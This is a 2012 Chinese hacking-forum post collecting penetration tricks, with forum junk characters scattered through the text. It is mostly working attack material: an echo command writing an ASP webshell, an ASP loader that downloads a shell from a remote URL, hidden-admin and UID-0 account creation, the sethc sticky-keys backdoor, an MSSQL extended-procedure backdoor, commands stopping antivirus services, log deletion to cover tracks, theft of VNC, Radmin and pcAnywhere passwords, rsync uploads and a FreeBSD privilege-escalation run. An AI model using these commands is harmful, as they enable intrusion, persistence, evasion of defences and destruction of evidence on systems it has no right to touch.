中国网络渗透测试联盟

标题: 渗透技巧总结 [打印本页]

---

作者: admin    时间: 2012-9-5 15:00
标题: 渗透技巧总结
旁站路径问题
$ V  W% D0 ~+ g& k. s# W1、读网站配置。
2、用以下VBS
9 l2 H; y6 H: X) H& YOn Error Resume Next
If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
4 v3 q6 x; W; f0 z2 S" h        

6 d$ Z# @2 Y% k! }! QMsgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "

$ X) V- y% \, X" ]" @Usage:Cscript vWeb.vbs",4096,"Lilo"
. a8 F$ C. T. _! Y& U* p        WScript.Quit
End If
4 N. n: y2 ]; L! |9 F+ E9 D5 }Set ObjService=GetObject
) U* }( s4 Q. X6 W9 N: i" J" {- M
& X$ S# a3 |, f! j8 g7 g" Z% }0 O("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
0 a! j% I- l8 Y; q; T        If IsNumeric(obj3w.Name)
/ n4 h8 j$ M/ c
4 T0 @: d1 }: d+ b5 _- u+ C. ]Then
9 _8 k! }% ^& |( O+ I- s/ f                Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
4 G2 r5 U6 b, ?9 ?* \         

       Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
4 I- d, J) Y: h# z0 o& E/ p                If Err
5 A- j/ j9 ]: R2 n7 ?. H, p
+ q" n! i4 v, f/ u1 S<> 0 Then WScript.Quit (1)
5 U7 Q. H: p8 J9 P6 N; x                WScript.Echo Chr(10) & "[" &
$ _' k3 S" z0 R
, y, J* ~' f+ p6 ?5 v% tOService.ServerComment & "]"
                For Each Binds In OService.ServerBindings
     

- a) j# |& R" v: V  T* t8 V                   Web = "{ " & Replace(Binds,":"," } { ") & " }"
                        
- s8 z- U2 Q4 a! |* B
WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
                Next
- B. i8 k3 |+ s7 o1 X  H6 x      
3 T% i3 {& ^! ?! y; u7 C
" d* ?2 X# R. P$ \         WScript.Echo "ath            : " & VDirObj.Path
& ]2 b1 W- O1 `! s4 [        End If
8 Q8 J! l' p& d& Z  MNext
复制代码
3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权）
4 t6 ]& y. R1 R- M7 C* C: E4、得到目标站目录，不能直接跨的。通过echo  ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp  像目标目录写入webshell。或者还可以试试type命令.
9 ?9 n  M. T7 y. M% }& C—————————————————————
WordPress的平台，爆绝对路径的方法是：
url/wp-content/plugins/akismet/akismet.php
url/wp-content/plugins/akismet/hello.php
——————————————————————
phpMyAdmin暴路径办法:
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
+ i) a% A5 W6 z' _+ h; FphpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php
————————————————————
网站可能目录(注：一般是虚拟主机类）
( d' ]# ]0 P: Adata/htdocs.网站/网站/
————————————————————
CMD下操作VPN相关
! X" a+ y% s/ W7 ~1 L% hnetsh ras set user administrator permit #允许administrator拨入该VPN
) a, b  ]3 m! Q( e6 u' `3 r0 e6 nnetsh ras set user administrator deny #禁止administrator拨入该VPN
netsh ras show user #查看哪些用户可以拨入VPN
3 ]1 f. n! p9 a! p9 O  K- Anetsh ras ip show config #查看VPN分配IP的方式
netsh ras ip set addrassign method = pool #使用地址池的方式分配IP
; j" y7 Q- q! W) a  ^% P* knetsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
————————————————————
2 H1 ^2 [8 y6 r# W, O5 F2 `' C+ k命令行下添加SQL用户的方法
& i* L+ t; q; H7 K1 I; O  J需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
) @1 g8 k2 f4 w: R然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry

1 v, Q( b1 Q. i9 [  L7 [  J另类的加用户方法
. K' p  ~( v+ j* |9 s在删掉了net.exe和不用adsi之外，新的加用户的方法。代码如下：
/ N4 y5 b! o% W! U/ Hjs:
0 U, _. b, ]& \0 ^/ xvar o=new ActiveXObject( "Shell.Users" );
1 H9 C# C# k% l+ u; ~z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;

7 t/ S5 t* u9 S: }  H" jvbs:
2 P: [( i$ f- p: i5 P  ^Set   o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
0 T, `" |$ y0 w8 Uz.setting("AccountType")=3
4 y" h6 S( j( N6 }% \6 N% e——————————————————
+ d9 a1 {1 N# I* Rcmd访问控制权限控制（注：反everyone不可读，工具-文件夹选项-使用简单的共享去掉即可）
9 l* h$ Y5 J$ |; N4 n/ \: H
) j$ X7 M3 B. Y  t, a6 [7 M命令如下
cacls c: /e /t /g everyone:F           #c盘everyone权限
4 r. O" w% c7 `7 T+ ecacls "目录" /d everyone               #everyone不可读，包括admin
) |/ N$ B2 k; X9 e————————以下配合PR更好————
3389相关
a、防火墙TCP/IP筛选.（关闭net stop policyagent & net stop sharedaccess）
5 a$ x% s9 y( P* gb、内网环境（LCX）
c、终端服务器超出了最大允许连接
XP 运行mstsc /admin
2003 运行mstsc /console   

杀软关闭（把杀软所在的文件的所有权限去掉）
" f. y/ `4 O4 m( H! J! P! _处理变态诺顿企业版：
net stop "Symantec AntiVirus" /y
net stop "Symantec AntiVirus Definition Watcher" /y
& N( L# ~4 i) c1 `; W- Cnet stop "Symantec Event Manager" /y
net stop "System Event Notification" /y
net stop "Symantec Settings Manager" /y
: S6 Z; G, l! C
卖咖啡：net stop "McAfee McShield"
————————————————————
, h" K. }# M  N2 s* k: K
5次SHIFT：
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
——————————————————————
% H# F( q0 n/ ^( }, s, K5 X隐藏账号添加：
( G6 n1 _9 _: I+ `1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
* b6 ?7 B" @. ~0 z' w' ]+ n2、导出注册表SAM下用户的两个键值
' l( G6 ?' T( p1 c4 Q+ p6 D3、在用户管理界面里的admin$删除，然后把备份的注册表导回去。
2 F5 N4 J/ F4 N; s5 `! g4、利用Hacker Defender把相关用户注册表隐藏
5 p* ~, n3 h5 r" g7 @/ g# }7 c——————————————————————
9 e7 W/ e5 ]5 m# CMSSQL扩展后门：
USE master;
6 t- t+ j* b1 r/ @+ M5 F/ ?/ |. |) mEXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
GRANT exec On xp_helpsystem TO public;
———————————————————————
) u+ M" [. d  O+ W2 s日志处理
C:\WINNT\system32\LogFiles\MSFTPSVC1>下有
* t5 m: R, z  J, o: k  p7 Eex011120.log / ex011121.log / ex011124.log三个文件，
. |7 ]. ?# {% \( G直接删除 ex0111124.log
; t% ~' L1 e& P不成功，“原文件...正在使用”
! e* x3 a$ I: o: t1 Z$ \当然可以直接删除ex011120.log / ex011121.log
用记事本打开ex0111124.log，删除里面的一些内容后，保存，覆盖退出，成功。
当停止msftpsvc服务后可直接删除ex011124.log
2 g( ]+ o8 V4 x' {  W* N$ C
9 J( R! }; S, B1 `+ {MSSQL查询分析器连接记录清除：
MSSQL 2000位于注册表如下：
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
% \$ g" I5 T  {8 D4 L找到接接过的信息删除。
MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL

) n6 [- Y' e; q/ ?; [8 ?6 ]* l8 yServer\90\Tools\Shell\mru.dat
—————————————————————————
  k) g" c9 U( q2 a  b4 B防BT系统拦截可使用远程下载shell，也达到了隐藏自身的效果，也可以做为超隐蔽的后门，神马的免杀webshell，用服务器安全工具一扫通通挂掉了）
+ D* l7 M5 J# F. |
, m1 m% c+ h# c; G5 Y9 h0 i<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
- a$ M/ k5 F' @; {Dim Ads, Retrieval, GetRemoteData
7 w* ^/ c+ p) EOn Error Resume Next
% ~4 U' v8 D' B8 @' q6 f" fSet Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
With Retrieval
' [0 B1 b, O; j0 N% B.Open "Get", s_RemoteFileUrl, False, "", ""
.Send
& t, N! `$ _  N0 f9 t6 k* t, y: R# L9 tGetRemoteData = .ResponseBody
End With
Set Retrieval = Nothing
Set Ads = Server.CreateObject("Adodb.Stream")
7 A) T3 G8 B! IWith Ads
- }( ?0 }; T( `* R' j6 i/ ]& N.Type = 1
4 k; m8 _" g8 W3 w7 F' [6 |.Open
; {2 x2 |. o' T* }. w.Write GetRemoteData
.SaveToFile Server.MapPath(s_LocalFileName), 2
.Cancel()
. Y% t3 J0 t0 B1 \) Z2 Z4 n% {, P.Close()
End With
( u% K/ R* R( e" R9 eSet Ads=nothing
End Sub

6 R! M6 o- ~0 \7 O% yeWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
%>
  t. W+ B3 O( R0 e! R  |- q
  g7 X2 h8 d  U7 TVNC提权方法:
- c3 v2 g8 @1 G利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
  J8 M- z- j" c( o( ~注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
  l; U1 Z  }) Z- M$ @& p, tregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
% Y' S6 [" l/ Vregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"
Radmin 默认端口是4899，
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
然后用HASH版连接。
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。
保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
Users\Application Data\Symantec\pcAnywhere\文件夹下。
( \( Z: R5 J' B7 V——————————————————————
搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
/ G- P  n' l( ?5 v" R( B4 D——————————————————----------
WinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式下下
来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。
没有删cmd组建的直接加用户。
7i24的web目录也是可写，权限为administrator。

1433 SA点构建注入点。
' Q& y6 D, g2 W6 _" `( L/ p9 ?6 s<%
, d4 m( l  ~( X* v6 j' P5 pstrSQLServerName = "服务器ip"
strSQLDBUserName = "数据库帐号"
strSQLDBPassword = "数据库密码"
  ~; r) g8 p$ ZstrSQLDBName = "数据库名称"
6 m6 P" t: O; J$ K1 Y# l( q( ]Set conn = Server.createObject("ADODB.Connection")
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName &

";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" &

, m" B* U* G( {. U/ h1 K/ rstrSQLDBName & ";"
8 Y7 Z+ ?8 k( r: q! O0 c4 u9 wconn.open strCon
dim rs,strSQL,id
: h# d, ~* W1 M* h; F; hset rs=server.createobject("ADODB.recordset")
. Y* b8 ?" p! J# c6 V$ Iid = request("id")
# I' f& V1 O1 p, FstrSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
rs.close
- ~8 H$ s( E4 F4 U* k7 n8 \%>
) r& \  ]4 n$ W) ]* _+ N) y: D( C复制代码
******liunx 相关******
一.ldap渗透技巧
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式

; M9 K" e4 e& b2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
1 n1 k8 J# v) F# A' R& A
3.查找管理员信息
4 ^' X0 {8 V9 X匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
" J4 L, ~2 A, H& i6 f# D
0 ?( H# I) F! j; J: X# e' F"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
% j9 O8 |6 j% F- R0 X' L有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
' z* d/ H4 n" }4 U
; w, d; ~# [" ^6 I$ e% H"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
2 z) a9 j; ^  Z. l" o$ |% o: c
1 ?; }2 h+ F; F. g8 W7 [
* I" T& u2 t  m3 R5 [4.查找10条用户记录
0 w+ L0 L% X0 Z5 `7 j* Gldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:
; T- f/ @7 z2 u8 x1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
+ L5 Q1 Q; r( |. [* o找到ou,dc,dc设置

. v& ]- |9 f+ R- y, d3.查找管理员信息
匿名方式
) l0 d3 B, a7 ]5 _+ C5 Xldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

5 ^8 m5 r# c1 o4 f) i! z/ l1 \8 @5 {"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
/ _. B6 q2 z: G( N# [$ l8 B" Eldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
: {2 s0 w3 y* X$ q
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

, @% h% D6 ]9 x  f
# n1 F5 Z0 p: b2 ]) J$ ~4.查找10条用户记录
' R& q$ `0 {  rldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战:
1.返回所有的属性
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
8 p2 W/ o% w; \  I2 Uversion: 1
( T) {) O1 u! t! Z& s( }+ ]dn: dc=ruc,dc=edu,dc=cn
dc: ruc
2 K, e! j, W/ y4 k. NobjectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
' w; q$ D) l9 @) a; C3 fsn: manager
' Z3 a. c) n  `* S0 qcn: manager
, b4 `% f8 |/ V: B
9 C0 A# [8 g9 r9 j" k2 gdn: uid=superadmin,dc=ruc,dc=edu,dc=cn
' l9 o8 \% V7 R" I/ g' j6 S2 Ruid: superadmin
) }! V- X" q* q$ h7 HobjectClass: inetOrgPerson
0 A7 q$ l) Q$ o( I- UobjectClass: organizationalPerson
objectClass: person
objectClass: top
sn: superadmin
cn: superadmin
' ]/ f1 b/ ~( W
/ C9 `: k, h) f" L$ Z2 xdn: uid=admin,dc=ruc,dc=edu,dc=cn
1 v  t7 v+ K- Q: X+ g( buid: admin
% `- \# I; d6 X  Z# x6 X, FobjectClass: inetOrgPerson
objectClass: organizationalPerson
% a6 j- n8 Z: PobjectClass: person
9 K( k& G. t6 g( h7 b% |4 u" ^4 A# _objectClass: top
. f' t5 z  G- j2 B$ S9 nsn: admin
: X2 z5 g6 @1 T4 ?* ccn: admin
. l6 @+ @% c5 X3 p2 d
& B% W5 e1 W8 r# f& o1 w9 _  cdn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
6 _6 Y. O7 q: _( U* [  VobjectClass: top
7 b7 p4 a" o+ U$ VobjectClass: person
& k5 W, ]% k9 ?# PobjectClass: organizationalPerson
objectClass: inetOrgPerson
4 [2 ^6 ~5 v  Msn: dcp_anonymous
cn: dcp_anonymous

- E- x1 }6 L# ?* ^. W2.查看基类
- Y3 `$ S: W6 u4 v8 q1 Zbash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" |
# {' Y7 ^/ `8 c# k
/ K) [; Z4 T# V) U5 a/ zmore
version: 1
dn: dc=ruc,dc=edu,dc=cn
7 \: k+ v$ Z" z5 V" pdc: ruc
. A6 p7 T4 A+ j) C$ J: eobjectClass: domain

3.查找
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
; @, j7 J1 E- v5 [+ Z8 H! }( B' ydn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
8 h0 Q; g7 [2 _/ R) x& V$ O9 PsupportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
" q. k, A9 G  _6 X7 j6 Y2 NsupportedExtension: 2.16.840.1.113730.3.5.3
supportedExtension: 2.16.840.1.113730.3.5.5
6 S( C, Y1 f) m) r# J8 `supportedExtension: 2.16.840.1.113730.3.5.6
' ~9 R- a6 V) K# x' AsupportedExtension: 2.16.840.1.113730.3.5.4
% d" B1 v4 J+ {supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
( A/ Z! a4 Q  osupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
6 @# L! x' H( H: Z5 csupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
4 u4 O/ Y; p  Z- }7 B9 BsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
" R; T9 E* s# B( C- dsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
3 ]: c9 y& t& F& Z+ _; Z0 PsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
- u, T! L/ b- G+ esupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
! X8 {* [4 X; c7 e4 y/ }& }% WsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
$ X5 p- @; S0 H) O; X5 RsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
$ h8 y3 D4 a; M- h8 [+ D, TsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
# {, O+ X, _* E4 `- BsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
$ U% N! r+ H# h6 E9 osupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
supportedExtension: 1.3.6.1.4.1.1466.20037
* u7 J# G6 s9 d# o3 m9 jsupportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
! m$ v( ?1 V8 s1 _supportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.16
supportedControl: 2.16.840.1.113730.3.4.15
- u" y0 N0 U+ r' RsupportedControl: 2.16.840.1.113730.3.4.17
supportedControl: 2.16.840.1.113730.3.4.19
# T0 h, A5 e0 H$ z0 D( K# A5 X; N+ BsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
supportedControl: 1.3.6.1.4.1.1466.29539.12
/ O' u9 M5 c: x. k/ AsupportedControl: 2.16.840.1.113730.3.4.12
supportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.13
4 ~/ ~; S; A4 u; m6 m1 O( vsupportedSASLMechanisms: EXTERNAL
! @( O6 u% m# Q% E0 w1 KsupportedSASLMechanisms: DIGEST-MD5
" N3 @4 \% Y' H' e' ZsupportedLDAPVersion: 2
7 y  x& i% z, _3 DsupportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
5 y& F) k6 J' S) X( X1 y- TvendorVersion: Sun-Java(tm)-System-Directory/6.2
* c& i6 p" @; Kdataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
) @2 W7 R& s9 x* \, y, h, C5 isupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
+ h# r" x  r, n8 EsupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
' L% G: a" j. _" W: \5 lsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
) F1 r- A* t* ^( `8 x2 JsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
% c0 S% e- w% q5 F0 ?supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
8 i3 I. J% Z" msupportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
5 v& B1 g% q8 M) NsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
6 m0 }0 {; ]. L1 k/ tsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
6 w8 R# l! \; isupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
+ v' [; W. P) a( p( osupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
* F4 Q! ?! N6 A( \supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
' L( ^  _7 P5 YsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
# x( `1 K6 Y# H% N" T9 NsupportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
" W6 H* ~" v6 }' f7 HsupportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
" O, Q9 q; u, m; b$ d( ssupportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
. o0 A- _# R( V7 `# y# f9 M3 csupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
9 m% q' @. e/ |+ e: P' }supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
" ?+ F! F0 _9 c+ l3 ], r) MsupportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
# V; Y. D5 `  |3 z7 U6 zsupportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
" a, b: |# [# W  U1 K/ `supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
/ A) k1 n+ f% P, X# ^supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
4 Z! G: F, Z, u& N' \( xsupportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
7 p  |& R0 z4 _0 ?9 @5 [% ksupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
$ s5 S; p; n( J4 y2 p4 d. b7 BsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
) l5 M) W1 ^& m) G9 T- TsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
9 ]7 t( s5 g  T1 k5 ksupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
% R$ |3 S1 O& y* t0 F. i( O# W6 v' @supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
: T" G6 o" Y( l/ SsupportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
) I, J' e9 c, u7 h' qsupportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
————————————
2. NFS渗透技巧
showmount -e ip
2 [) P8 ~' c$ p% P" v- R  Z, U% u: Z列举IP
8 g3 ~8 }9 e8 q9 @——————
3.rsync渗透技巧
1.查看rsync服务器上的列表
! _: u6 {' ^, j. z' V: xrsync 210.51.X.X::
. O% D! N2 u  Sfinance
img_finance
auto
+ J, f+ r! v7 K* M3 `  }6 Gimg_auto
( ]% W$ t' Q& B4 Bhtml_cms
! j) {& X1 v; pimg_cms
ent_cms
ent_img
ceshi
8 C/ }' g; c/ Fres_img
res_img_c2
1 B2 @5 x% M$ b+ gchip
( T  b4 i" H" E* w# Ochip_c2
' [& Z1 s  W: A5 C9 D+ w- fent_icms
) }1 J: Z+ F  D8 J" ]* h5 fgames
gamesimg
media
6 o& S: ?1 O6 l+ x) x) qmediaimg
( z5 [1 X. M. [) ^( P$ Gfashion
res-fashion
! e9 O4 p% Z3 lres-fo
taobao-home
1 x/ E. s5 b: v+ ares-taobao-home
+ U* ]8 T2 ~; ehouse
9 ~- W# s6 s, s8 ures-house
res-home
- ]- \1 }0 A+ ?; q. j$ Xres-edu
res-ent
res-labs
6 r1 S+ H; H4 i7 f5 D, N0 n$ Hres-news
res-phtv
0 X8 R# p5 b( U) Q0 ^) G$ u+ Ires-media
home
edu
1 @3 x+ S, c( [- Z. \news
res-book

看相应的下级目录(注意一定要在目录后面添加上/)
( d% U8 i" X$ i2 L) o" c) W
, t# n$ x4 \2 l9 r, w$ A
0 C8 }2 n" k7 s  C+ hrsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/

2.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

5 j/ l( c% K, ]9 p( A/ [7 H3.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
& W/ d! i+ |) G: f: F" y+ b; ~http://app.finance.xxx.com/warn/nothack.txt
6 p$ }" n) C; l' w3 E) ^
  I0 v$ C7 V5 E  v2 `四.squid渗透技巧
nc -vv baidu.com 80
2 d' d; F2 W9 q0 O, IGET HTTP://www.sina.com / HTTP/1.0
3 O  G' p. s& z" p* iGET HTTP://WWW.sina.com:22 / HTTP/1.0
- F# h" p* U# B* o: d五.SSH端口转发
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

/ R$ U4 K) Q! y& F9 I. r7 |六.joomla渗透小技巧
确定版本
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-

15&catid=32:languages&Itemid=47
0 i+ t; o* Z: V+ M; G$ h" z
; T& d# g1 D( {1 O4 v: W9 j重新设置密码
index.php?option=com_user&view=reset&layout=confirm

七: Linux添加UID为0的root用户
useradd -o -u 0 nothack

八.freebsd本地提权
3 A; H2 p2 w$ K2 q) y[argp@julius ~]$ uname -rsi
0 c1 Y- |$ M& e8 e; u* freebsd 7.3-RELEASE GENERIC
2 d5 {1 D; r/ M6 S0 Q* [argp@julius ~]$ sysctl vfs.usermount
8 W" j4 w$ ^4 }8 B7 S% R# G* vfs.usermount: 1
* [argp@julius ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
$ x! f6 \' j6 U1 D: |! B7 v" y* [argp@julius ~]$ ./nfs_mount_ex
' S6 r# p9 X$ [; [  Y3 U*
' {; v8 @7 _% Wcalling nmount()

